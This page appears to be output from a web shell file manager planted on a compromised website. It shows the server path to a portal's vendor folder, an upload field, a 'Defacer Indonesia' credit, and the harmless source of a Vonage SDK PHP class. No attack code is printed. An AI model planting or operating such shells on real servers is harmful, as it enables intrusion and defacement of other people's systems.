whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
vonage
/
client-core
/
src
/
Messages
/
Webhook
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/vonage/client-core/src/Messages/Webhook/InboundMessenger.php
<?php declare(strict_types=1); namespace Vonage\Messages\Webhook; use Vonage\Entity\Hydrator\ArrayHydrateInterface; final class InboundMessenger implements ArrayHydrateInterface { protected ?array $data = null; public function fromArray(array $data): self { $this->data = $data; return $this; } public function toArray(): array { return $this->data; } public function __get($name) { return $this->data[$name]; } }
Copyright ©2021 || Defacer Indonesia